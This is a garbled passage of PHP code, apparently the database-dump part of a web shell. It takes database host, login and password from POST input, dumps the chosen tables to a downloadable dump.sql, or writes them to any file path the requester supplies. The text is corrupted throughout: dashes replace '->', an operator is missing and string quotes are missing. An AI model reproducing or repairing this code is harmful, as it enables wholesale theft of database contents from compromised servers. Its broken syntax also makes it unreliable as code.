\n; if ($fp) fwrite ($fp, $sql); else echo ($sql);} break;} return false;}}; $db = new DbClass ($_POST ['type']); if ((@$_POST ['p2']=='download') (@$_POST ['p1']!='select')) {$db— connect ($_POST ['sql_host'], $_POST ['sql_login'], $_POST ['sql_pass'], $_POST ['sql_base']); $db— selectdb ($_POST ['sql_base']); switch ($_POST ['charset']) {case Windows-1251: $db— setCharset ('cp1251'); break; case UTF-8: $db— setCharset ('utf8'); break; case KOI8-R: $db— setCharset ('koi8r'); break; case KOI8-U: $db— setCharset ('koi8u'); break; case cp866: $db— setCharset ('cp866'); break;} if (empty ($_POST ['file'])) {ob_start (ob_gzhandler, 4096); header (Content-Disposition: attachment; filename=dump.sql); header (Content-Type: text/plain); foreach ($_POST ['tbl'] as $v) $db— dump ($v); exit;} elseif ($fp = @fopen ($_POST ['file'], 'w')) {foreach ($_POST ['tbl'] as $v) $db— dum